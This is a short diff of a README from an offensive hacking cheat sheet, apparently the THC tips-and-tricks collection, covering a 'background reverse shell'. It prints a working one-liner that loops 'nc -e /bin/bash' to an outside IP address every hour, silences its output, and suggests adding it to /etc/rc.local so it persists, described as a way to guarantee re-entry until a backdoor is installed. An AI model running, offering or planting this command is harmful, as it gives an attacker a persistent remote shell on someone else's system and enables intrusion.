hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 <a id="bdrs-anchor"></a>
 **6.i.
 Background reverse shell**

 A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinately).
-Often used until a real backdoor has been deployed.
+Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected.
 Add to */etc/rc.local* if required...

 ```
 $ (while :; do nc -e /bin/bash -vn 3.13.3.7 1524; sleep 3600; done ) &>/dev/null &